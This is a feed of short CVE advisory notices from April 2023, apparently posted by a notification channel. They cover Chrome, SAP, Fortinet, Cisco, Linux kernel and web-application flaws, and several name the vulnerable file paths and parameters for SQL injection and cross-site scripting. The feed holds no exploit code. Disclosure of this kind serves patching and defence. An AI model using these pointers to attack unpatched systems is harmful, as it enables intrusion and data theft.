🚨 CVE-2023-1531Use after free in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-12 06:04:05 |
🚨 CVE-2023-1532Out of bounds read in GPU Video in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-12 06:04:04 |
🚨 CVE-2023-1533Use after free in WebProtect in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-12 06:04:03 |
🚨 CVE-2022-45188Netatalk through 3.1.13 has an afp_getappl heap-based buffer overflow resulting in code execution via a crafted .appl file. This provides remote root access on some platforms such as FreeBSD (used for TrueNAS).🎖@cveNotify |
|
| 2023-04-12 06:04:02 |
🚨 CVE-2023-28879In Artifex Ghostscript through 10.01.0, there is a buffer overflow leading to potential corruption of data internal to the PostScript interpreter, in base/sbcp.c. This affects BCPEncode, BCPDecode, TBCPEncode, and TBCPDecode. If the write buffer is filled to one byte less than full, and one then tries to write an escaped character, two bytes are written.🎖@cveNotify |
|
| 2023-04-12 06:03:58 |
🚨 CVE-2023-1281Use After Free vulnerability in Linux kernel traffic control index filter (tcindex) allows Privilege Escalation. The imperfect hash area can be updated while packets are traversing, which will cause a use-after-free when 'tcf_exts_exec()' is called with the destroyed tcf_ext. A local attacker user can use this vulnerability to elevate its privileges to root.This issue affects Linux Kernel: from 4.14 before git commit ee059170b1f7e94e55fa6cadee544e176a6e59c2.🎖@cveNotify |
|
| 2023-04-12 06:03:57 |
🚨 CVE-2022-41723A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.🎖@cveNotify |
|
| 2023-04-12 06:03:56 |
🚨 CVE-2022-48340In Gluster GlusterFS 11.0, there is an xlators/cluster/dht/src/dht-common.c dht_setxattr_mds_cbk use-after-free.🎖@cveNotify |
|
| 2023-04-12 06:03:55 |
🚨 CVE-2023-26253In Gluster GlusterFS 11.0, there is an xlators/mount/fuse/src/fuse-bridge.c notify stack-based buffer over-read.🎖@cveNotify |
|
| 2023-04-12 06:03:54 |
🚨 CVE-2023-20141Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. These vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device and then persuading a user to visit specific web pages that include malicious payloads. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco has not released software updates that address these vulnerabilities.🎖@cveNotify |
|
| 2023-04-12 01:58:34 |
🚨 CVE-2023-25617SAP Business Object (Adaptive Job Server) - versions 420, 430, allows remote execution of arbitrary commands on Unix, when program objects execution is enabled, to authenticated users with scheduling rights, using the BI Launchpad, Central Management Console or a custom application based on the public java SDK. Programs could impact the confidentiality, integrity and availability of the system.🎖@cveNotify |
|
| 2023-04-12 01:58:33 |
🚨 CVE-2023-0024SAP Solution Manager (BSP Application) - version 720, allows an authenticated attacker to craft a malicious link, which when clicked by an unsuspecting user, can be used to read or modify some sensitive information or craft a payload which may restrict access to the desired resources, resulting in Cross-Site Scripting vulnerability.🎖@cveNotify |
|
| 2023-04-12 01:58:32 |
🚨 CVE-2023-0025SAP Solution Manager (BSP Application) - version 720, allows an authenticated attacker to craft a malicious link, which when clicked by an unsuspecting user, can be used to read or modify some sensitive information or craft a payload which may restrict access to the desired resources.🎖@cveNotify |
|
| 2023-04-12 01:58:31 |
🚨 CVE-2023-23851SAP Business Planning and Consolidation - versions 200, 300, allows an attacker with business authorization to upload any files (including web pages) without the proper file format validation. If other users visit the uploaded malicious web page, the attacker may perform actions on behalf of the users without their consent impacting the confidentiality and integrity of the system.🎖@cveNotify |
|
| 2023-04-12 01:58:27 |
🚨 CVE-2023-23853An unauthenticated attacker in AP NetWeaver Application Server for ABAP and ABAP Platform - versions 700, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 789, 790, can craft a link which when clicked by an unsuspecting user can be used to redirect a user to a malicious site which could read or modify some sensitive information or expose the victim to a phishing attack. Vulnerability has no direct impact on availability.🎖@cveNotify |
|
| 2023-04-12 01:58:26 |
🚨 CVE-2023-23854SAP NetWeaver Application Server for ABAP and ABAP Platform - versions 700, 701, 702, 731, 740, 750, 751, 752, does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges.🎖@cveNotify |
|
| 2023-04-12 01:58:25 |
🚨 CVE-2023-23855SAP Solution Manager - version 720, allows an authenticated attacker to redirect users to a malicious site due to insufficient URL validation. A successful attack could lead an attacker to read or modify the information or expose the user to a phishing attack. As a result, it has a low impact to confidentiality, integrity and availability.🎖@cveNotify |
|
| 2023-04-12 01:58:24 |
🚨 CVE-2023-23859SAP NetWeaver AS for ABAP and ABAP Platform - versions 740, 750, 751, 752, 753, 754, 755, 756, 757, 789, 790, allows an unauthenticated attacker to craft a malicious link, which when clicked by an unsuspecting user, can be used to read or modify some sensitive information.🎖@cveNotify |
|
| 2023-04-12 01:58:21 |
🚨 CVE-2023-23860SAP NetWeaver AS for ABAP and ABAP Platform - versions 740, 750, 751, 752, 753, 754, 755, 756, 757, 789, 790, allows an unauthenticated attacker to craft a link, which when clicked by an unsuspecting user can be used to redirect a user to a malicious site which could read or modify some sensitive information or expose the victim to a phishing attack.🎖@cveNotify |
|
| 2023-04-12 01:58:20 |
🚨 CVE-2023-24521Due to insufficient input sanitization, SAP NetWeaver AS ABAP (BSP Framework) - versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an unauthenticated user to alter the current session of the user by injecting the malicious code over the network and gain access to the unintended data. This may lead to a limited impact on the confidentiality and the integrity of the application.🎖@cveNotify |
|
| 2023-04-12 01:58:19 |
🚨 CVE-2023-24523An attacker authenticated as a non-admin user with local access to a server port assigned to the SAP Host Agent (Start Service) - versions 7.21, 7.22, can submit a crafted ConfigureOutsideDiscovery request with an operating system command which will be executed with administrator privileges. The OS command can read or modify any user or system data and can make the system unavailable.🎖@cveNotify |
|
| 2023-04-12 01:58:18 |
🚨 CVE-2023-24524SAP S/4 HANA Map Treasury Correspondence Format Data does not perform necessary authorization check for an authenticated user, resulting in escalation of privileges. This could allow an attacker to delete the data with a high impact to availability.🎖@cveNotify |
|
| 2023-04-12 01:58:14 |
🚨 CVE-2023-24528SAP Fiori apps for Travel Management in SAP ERP (My Travel Requests) - version 600, allows an authenticated attacker to exploit a certain misconfigured application endpoint to view sensitive data. This endpoint is normally exposed over the network and successful exploitation can lead to exposure of data like travel documents.🎖@cveNotify |
|
| 2023-04-12 01:58:13 |
🚨 CVE-2023-24530SAP BusinessObjects Business Intelligence Platform (CMC) - versions 420, 430, allows an authenticated admin user to upload malicious code that can be executed by the application over the network. On successful exploitation, attacker can perform operations that may completely compromise the application causing high impact on confidentiality, integrity and availability of the application.🎖@cveNotify |
|
| 2023-04-12 01:58:12 |
🚨 CVE-2023-25614SAP NetWeaver AS ABAP (BSP Framework) application - versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allow an unauthenticated attacker to inject the code that can be executed by the application over the network. On successful exploitation it can gain access to the sensitive information which leads to a limited impact on the confidentiality and the integrity of the application.🎖@cveNotify |
|
| 2023-04-11 22:58:32 |
🚨 CVE-2023-1989A use-after-free flaw was found in btsdio_remove in drivers\bluetooth\btsdio.c in the Linux Kernel. In this flaw, a call to btsdio_remove with an unfinished job, may cause a race problem leading to a UAF on hdev devices.🎖@cveNotify |
|
| 2023-04-11 22:58:31 |
🚨 CVE-2023-22614An issue was discovered in ChipsetSvcSmm in Insyde InsydeH2O with kernel 5.0 through 5.5. There is insufficient input validation in BIOS Guard updates. An attacker can induce memory corruption in SMM by supplying malformed inputs to the BIOS Guard SMI handler.🎖@cveNotify |
|
| 2023-04-11 22:58:30 |
🚨 CVE-2023-22808An issue was discovered in the Arm Android Gralloc Module. A non-privileged user can read a small portion of the allocator process memory. This affects Bifrost r24p0 through r41p0 before r42p0, Valhall r24p0 through r41p0 before r42p0, and Avalon r41p0 before r42p0.🎖@cveNotify |
|
| 2023-04-11 22:58:29 |
🚨 CVE-2023-24883Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-04-11 22:58:26 |
🚨 CVE-2023-24884Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-11 22:58:25 |
🚨 CVE-2023-24886Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-11 22:58:24 |
🚨 CVE-2023-24914Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-04-11 22:58:23 |
🚨 CVE-2023-24925Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-11 22:58:19 |
🚨 CVE-2023-25407Aten PE8108 2.4.232 is vulnerable to Incorrect Access Control. Restricted users have read access to administrator credentials.🎖@cveNotify |
|
| 2023-04-11 22:58:18 |
🚨 CVE-2023-26260OXID eShop 6.2.x before 6.4.4 and 6.5.x before 6.5.2 allows session hijacking, leading to partial access of a customer's account by an attacker, due to an improper check of the user agent.🎖@cveNotify |
|
| 2023-04-11 22:58:17 |
🚨 CVE-2023-26552mstolfp in libntp/mstolfp.c in NTP 4.2.8p15 has an out-of-bounds write when adding a decimal point.🎖@cveNotify |
|
| 2023-04-11 22:58:13 |
🚨 CVE-2023-28218Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-04-11 22:58:12 |
🚨 CVE-2023-28222Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-04-11 22:58:11 |
🚨 CVE-2023-28226Windows Enroll Engine Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-04-11 20:58:32 |
🚨 CVE-2023-20127Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow a remote attacker to obtain privileged information and conduct cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-04-11 20:58:31 |
🚨 CVE-2023-1960A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. This issue affects some unknown processing of the file /classes/Master.php?f=delete_category. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225347.🎖@cveNotify |
|
| 2023-04-11 20:58:30 |
🚨 CVE-2023-20068A vulnerability in the web-based management interface of Cisco Prime Infrastructure Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user of the web-based management interface on an affected device to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or to access sensitive, browser-based information.🎖@cveNotify |
|
| 2023-04-11 20:58:26 |
🚨 CVE-2023-1958A vulnerability, which was classified as critical, was found in SourceCodester Online Computer and Laptop Store 1.0. This affects an unknown part of the file /classes/Master.php?f=delete_sub_category. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225345 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-11 20:58:25 |
🚨 CVE-2023-1952A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0. It has been classified as critical. This affects an unknown part of the file /?p=products of the component Product Search. The manipulation of the argument search leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225339.🎖@cveNotify |
|
| 2023-04-11 20:58:24 |
🚨 CVE-2023-20073A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.🎖@cveNotify |
|
| 2023-04-11 20:58:20 |
🚨 CVE-2023-1953A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/sales/index.php. The manipulation of the argument date_start/date_end leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225340.🎖@cveNotify |
|
| 2023-04-11 20:58:19 |
🚨 CVE-2023-1757Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.🎖@cveNotify |
|
| 2023-04-11 20:58:18 |
🚨 CVE-2023-1756Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.🎖@cveNotify |
|
| 2023-04-11 20:58:14 |
🚨 CVE-2020-19802File Upload vulnerability found in Milken DoyoCMS v.2.3 allows a remote attacker to execute arbitrary code via the upload file type parameter.🎖@cveNotify |
|
| 2023-04-11 20:58:13 |
🚨 CVE-2020-24736Buffer Overflow vulnerability found in SQLite3 v.3.27.1 and before allows a local attacker to cause a denial of service via a crafted script.🎖@cveNotify |
|
| 2023-04-11 20:58:12 |
🚨 CVE-2021-46878An issue was discovered in Treasure Data Fluent Bit 1.7.1, erroneous parsing in flb_pack_msgpack_to_json_format leads to type confusion bug that interprets whatever is on the stack as msgpack maps and arrays, leading to use-after-free. This can be used by an attacker to craft a specially craft file and trick the victim opening it using the affect software, triggering use-after-free and execute arbitrary code on the target system.🎖@cveNotify |
|
| 2023-04-11 19:00:54 |
🚨 CVE-2023-1817Insufficient policy enforcement in Intents in Google Chrome on Android prior to 112.0.5615.49 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-11 19:00:53 |
🚨 CVE-2023-1818Use after free in Vulkan in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-11 19:00:52 |
🚨 CVE-2023-1816Incorrect security UI in Picture In Picture in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to potentially perform navigation spoofing via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-11 19:00:50 |
🚨 CVE-2023-1814Insufficient validation of untrusted input in Safe Browsing in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to bypass download checking via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-11 19:00:49 |
🚨 CVE-2023-1815Use after free in Networking APIs in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-11 19:00:48 |
🚨 CVE-2023-1813Inappropriate implementation in Extensions in Google Chrome prior to 112.0.5615.49 allowed an attacker who convinced a user to install a malicious extension to bypass file access restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-11 19:00:46 |
🚨 CVE-2023-1810Heap buffer overflow in Visuals in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-11 19:00:45 |
🚨 CVE-2023-1812Out of bounds memory access in DOM Bindings in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-11 19:00:44 |
🚨 CVE-2023-1811Use after free in Frames in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-11 19:00:43 |
🚨 CVE-2023-0325Uvdesk version 1.1.1 allows an unauthenticated remote attacker to exploit a stored XSS in the application. This is possible because the application does not correctly validate the message sent by the clients in the ticket.🎖@cveNotify |
|
| 2023-04-11 19:00:41 |
🚨 CVE-2023-0265Uvdesk version 1.1.1 allows an authenticated remote attacker to execute commands on the server. This is possible because the application does not properly validate profile pictures uploaded by customers.🎖@cveNotify |
|
| 2023-04-11 19:00:40 |
🚨 CVE-2022-3695Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.3.0.0, 9.2.0.4 and 8.3.0.27 allow a malicious URL to inject content into a dashboard when the CDE plugin is present. 🎖@cveNotify |
|
| 2023-04-11 19:00:38 |
🚨 CVE-2022-43770Hitachi Vantara Pentaho Business Analytics Server versions before 9.3.0.0, 9.2.0.4 and 8.3.0.27 does not correctly perform an authorization check in the dashboard editor plugin API. 🎖@cveNotify |
|
| 2023-04-11 19:00:37 |
🚨 CVE-2022-27485A improper neutralization of special elements used in an sql command ('sql injection') vulnerability [CWE-89] in Fortinet FortiSandbox version 4.2.0, 4.0.0 through 4.0.2, 3.2.0 through 3.2.3, 3.1.x and 3.0.x allows a remote and authenticated attacker with read permission to retrieve arbitrary files from the underlying Linux system via a crafted HTTP request.🎖@cveNotify |
|
| 2023-04-11 19:00:36 |
🚨 CVE-2022-27487A improper privilege management in Fortinet FortiSandbox version 4.2.0 through 4.2.2, 4.0.0 through 4.0.2 and before 3.2.3 and FortiDeceptor version 4.1.0, 4.0.0 through 4.0.2 and before 3.3.3 allows a remote authenticated attacker to perform unauthorized API calls via crafted HTTP or HTTPS requests.🎖@cveNotify |
|
| 2023-04-11 19:00:34 |
🚨 CVE-2022-35850An improper neutralization of script-related HTML tags in a web page vulnerability [CWE-80] in FortiAuthenticator versions 6.4.0 through 6.4.4, 6.3.0 through 6.3.3, all versions of 6.2 and 6.1 may allow a remote unauthenticated attacker to trigger a reflected cross site scripting (XSS) attack via the "reset-password" page.🎖@cveNotify |
|
| 2023-04-11 19:00:33 |
🚨 CVE-2022-40679An improper neutralization of special elements used in an OS command vulnerability [CWE-78] in FortiADC 5.x all versions, 6.0 all versions, 6.1 all versions, 6.2.0 through 6.2.4, 7.0.0 through 7.0.3, 7.1.0; FortiDDoS 4.x all versions, 5.0 all versions, 5.1 all versions, 5.2 all versions, 5.3 all versions, 5.4 all versions, 5.5 all versions, 5.6 all versions and FortiDDoS-F 6.4.0, 6.3.0 through 6.3.3, 6.2.0 through 6.2.2, 6.1.0 through 6.1.4 may allow an authenticated attacker to execute unauthorized commands via specifically crafted arguments to existing commands.🎖@cveNotify |
|
| 2023-04-11 19:00:32 |
🚨 CVE-2022-40682A incorrect authorization in Fortinet FortiClient (Windows) 7.0.0 - 7.0.7, 6.4.0 - 6.4.9, 6.2.0 - 6.2.9 and 6.0.0 - 6.0.10 allows an attacker to execute unauthorized code or commands via sending a crafted request to a specific named pipe.🎖@cveNotify |
|
| 2023-04-11 19:00:31 |
🚨 CVE-2022-41330An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in Fortinet FortiOS version 7.2.0 through 7.2.3, version 7.0.0 through 7.0.9, version 6.4.0 through 6.4.11 and before 6.2.12 and FortiProxy version 7.2.0 through 7.2.1 and before 7.0.7 allows an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests.🎖@cveNotify |
|
| 2023-04-11 19:00:30 |
🚨 CVE-2022-41331A missing authentication for critical function vulnerability [CWE-306] in FortiPresence infrastructure server before version 1.2.1 allows a remote, unauthenticated attacker to access the Redis and MongoDB instances via crafted authentication requests.🎖@cveNotify |
|
| 2023-04-11 16:58:40 |
🚨 CVE-2023-23277Snippet-box 1.0.0 is vulnerable to Cross Site Scripting (XSS). Remote attackers can render arbitrary web script or HTML from the "Snippet code" form field.🎖@cveNotify |
|
| 2023-04-11 16:58:39 |
🚨 CVE-2023-26845A Cross-Site Request Forgery (CSRF) in OpenCATS 0.9.7 allows attackers to force users into submitting web requests via unspecified vectors.🎖@cveNotify |
|
| 2023-04-11 16:58:38 |
🚨 CVE-2023-26846A stored cross-site scripting (XSS) vulnerability in OpenCATS v0.9.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the city parameter at opencats/index.php?m=candidates.🎖@cveNotify |
|
| 2023-04-11 16:58:36 |
🚨 CVE-2023-26847A stored cross-site scripting (XSS) vulnerability in OpenCATS v0.9.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the state parameter at opencats/index.php?m=candidates.🎖@cveNotify |
|
| 2023-04-11 16:58:35 |
🚨 CVE-2023-27192An issue found in DUALSPACE Super Secuirty v.2.3.7 allows an attacker to cause a denial of service via the key_wifi_safe_net_check_url, KEY_Cirus_scan_whitelist and KEY_AD_NEW_USER_AVOID_TIME parameters.🎖@cveNotify |
|
| 2023-04-11 16:58:34 |
🚨 CVE-2023-30465Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.5.0. By manipulating the "orderType" parameter and the ordering of the returned content using an SQL injection attack, an attacker can extract the username of the user with ID 1 from the "user" table, one character at a time. Users are advised to upgrade to Apache InLong's 1.6.0 or cherry-pick [1] to solve it. https://programmer.help/blogs/jdbc-deserialization-vulnerability-learning.html [1] https://github.com/apache/inlong/issues/7529 https://github.com/apache/inlong/issues/7529 🎖@cveNotify |
|
| 2023-04-11 16:58:33 |
🚨 CVE-2022-41703A vulnerability in the SQL Alchemy connector of Apache Superset allows an authenticated user with read access to a specific database to add subqueries to the WHERE and HAVING fields referencing tables on the same database that the user should not have access to, despite the user having the feature flag "ALLOW_ADHOC_SUBQUERY" disabled (default value). This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.🎖@cveNotify |
|
| 2023-04-11 16:58:31 |
🚨 CVE-2017-11164In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.🎖@cveNotify |
|
| 2023-04-11 16:58:30 |
🚨 CVE-2023-28613An issue was discovered in Samsung Exynos Mobile Processor and Baseband Modem Processor for Exynos 1280, Exynos 2200, and Exynos Modem 5300. An integer overflow in IPv4 fragment handling can occur due to insufficient parameter validation when reassembling these fragments.🎖@cveNotify |
|
| 2023-04-11 16:58:29 |
🚨 CVE-2023-27770An issue found in Wondershare Technology Co.,Ltd Edraw-max v.12.0.4 allows a remote attacker to execute arbitrary commands via the edraw-max_setup_full5371.exe file.🎖@cveNotify |
|
| 2023-04-11 16:58:28 |
🚨 CVE-2023-27487Envoy is an open source edge and service proxy designed for cloud-native applications. Prior to versions 1.26.0, 1.25.3, 1.24.4, 1.23.6, and 1.22.9, the client may bypass JSON Web Token (JWT) checks and forge fake original paths. The header `x-envoy-original-path` should be an internal header, but Envoy does not remove this header from the request at the beginning of request processing when it is sent from an untrusted client. The faked header would then be used for trace logs and grpc logs, as well as used in the URL used for `jwt_authn` checks if the `jwt_authn` filter is used, and any other upstream use of the x-envoy-original-path header. Attackers may forge a trusted `x-envoy-original-path` header. Versions 1.26.0, 1.25.3, 1.24.4, 1.23.6, and 1.22.9 have patches for this issue.🎖@cveNotify |
|
| 2023-04-11 16:58:26 |
🚨 CVE-2022-48227An issue was discovered in Acuant AsureID Sentinel before 5.2.149. It allows elevation of privileges because it opens Notepad after the installation of AssureID, Identify x64, and Identify x86, aka CORE-7361.🎖@cveNotify |
|
| 2023-04-11 16:58:25 |
🚨 CVE-2023-26974Irfanview v4.62 allows a user-mode write access violation via a crafted JPEG 2000 file starting at JPEG2000+0x0000000000001bf0.🎖@cveNotify |
|
| 2023-04-11 16:58:24 |
🚨 CVE-2023-1849A vulnerability was found in SourceCodester Online Payroll System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/cashadvance_row.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224989 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-11 16:58:22 |
🚨 CVE-2023-1850A vulnerability was found in SourceCodester Online Payroll System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/login.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-224990 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-11 16:58:21 |
🚨 CVE-2023-1851A vulnerability classified as problematic has been found in SourceCodester Online Payroll System 1.0. This affects an unknown part of the file /admin/employee_add.php. The manipulation of the argument of leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224991.🎖@cveNotify |
|
| 2023-04-11 16:58:20 |
🚨 CVE-2023-1847A vulnerability was found in SourceCodester Online Payroll System 1.0 and classified as critical. This issue affects some unknown processing of the file attendance.php. The manipulation of the argument employee leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224987.🎖@cveNotify |
|
| 2023-04-11 16:58:19 |
🚨 CVE-2023-1848A vulnerability was found in SourceCodester Online Payroll System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/attendance_row.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224988.🎖@cveNotify |
|
| 2023-04-11 16:58:17 |
🚨 CVE-2023-1845A vulnerability, which was classified as critical, was found in SourceCodester Online Payroll System 1.0. This affects an unknown part of the file /admin/employee_row.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224985 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-11 16:58:16 |
🚨 CVE-2023-1846A vulnerability has been found in SourceCodester Online Payroll System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/deduction_row.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-224986 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-11 15:58:35 |
🚨 CVE-2022-43293Wacom Driver 6.3.46-1 for Windows was discovered to contain an arbitrary file write vulnerability via the component \Wacom\Wacom_Tablet.exe.🎖@cveNotify |
|
| 2023-04-11 15:58:34 |
🚨 CVE-2023-24182LuCI openwrt-22.03 branch git-22.361.69894-438c598 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the component /system/sshkeys.js.🎖@cveNotify |
|
| 2023-04-11 15:58:32 |
🚨 CVE-2023-27191An issue found in DUALSPACE Super Secuirty v.2.3.7 allows an attacker to cause a denial of service via the SharedPreference files.🎖@cveNotify |
|
| 2023-04-11 15:58:31 |
🚨 CVE-2023-28340Zoho ManageEngine Applications Manager through 16320 allows the admin user to conduct an XXE attack.🎖@cveNotify |
|
| 2023-04-11 15:58:30 |
🚨 CVE-2023-28341Stored Cross site scripting (XSS) vulnerability in Zoho ManageEngine Applications Manager through 16340 allows an unauthenticated user to inject malicious javascript on the incorrect login details page.🎖@cveNotify |
|
| 2023-04-11 15:58:29 |
🚨 CVE-2023-24527SAP NetWeaver AS Java for Deploy Service - version 7.5, does not perform any access control checks for functionalities that require user identity enabling an unauthenticated attacker to attach to an open interface and make use of an open naming and directory API to access a service which will enable them to access but not modify server settings and data with no effect on availability and integrity.🎖@cveNotify |
|
| 2023-04-11 15:58:27 |
🚨 CVE-2023-26458An information disclosure vulnerability exists in SAP Landscape Management - version 3.0, enterprise edition. It allows an authenticated SAP Landscape Management user to obtain privileged access to other systems making those other systems vulnerable to information disclosure and modification.The disclosed information is for Diagnostics Agent Connection via Java SCS Message Server of an SAP Solution Manager system and can only be accessed by authenticated SAP Landscape Management users, but they can escalate their privileges to the SAP Solution Manager system.🎖@cveNotify |
|
| 2023-04-11 15:58:26 |
🚨 CVE-2023-27267Due to missing authentication and insufficient input validation, the OSCommand Bridge of SAP Diagnostics Agent - version 720, allows an attacker with deep knowledge of the system to execute scripts on all connected Diagnostics Agents. On successful exploitation, the attacker can completely compromise confidentiality, integrity and availability of the system.🎖@cveNotify |
|
| 2023-04-11 15:58:25 |
🚨 CVE-2023-27497Due to missing authentication and input sanitization of code the EventLogServiceCollector of SAP Diagnostics Agent - version 720, allows an attacker to execute malicious scripts on all connected Diagnostics Agents running on Windows. On successful exploitation, the attacker can completely compromise confidentiality, integrity and availability of the system.🎖@cveNotify |
|
| 2023-04-11 15:58:24 |
🚨 CVE-2023-27499SAP GUI for HTML - versions KERNEL 7.22, 7.53, 7.547.77, 7.81, 7.85, 7.89, 7.91, KRNL64UC, 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could craft a malicious URL and lure the victim to click, the script supplied by the attacker will execute in the victim user's browser. The information from the victim's web browser can either be modified or read and sent to the attacker.🎖@cveNotify |
|
| 2023-04-11 15:58:22 |
🚨 CVE-2023-28761In SAP NetWeaver Enterprise Portal - version 7.50, an unauthenticated attacker can attach to an open interface and make use of an open API to access a service which will enable them to access or modify server settings and data, leading to limited impact on confidentiality and integrity.🎖@cveNotify |
|
| 2023-04-11 15:58:21 |
